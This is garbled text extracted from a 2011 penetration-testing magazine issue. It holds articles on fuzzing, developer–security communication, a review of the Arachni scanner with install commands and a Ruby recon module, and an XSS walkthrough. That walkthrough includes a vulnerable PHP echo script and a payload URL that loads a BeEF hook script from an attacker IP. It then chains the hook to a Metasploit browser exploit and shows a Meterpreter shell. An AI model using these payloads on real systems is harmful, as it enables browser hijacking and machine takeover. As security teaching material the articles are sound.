Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
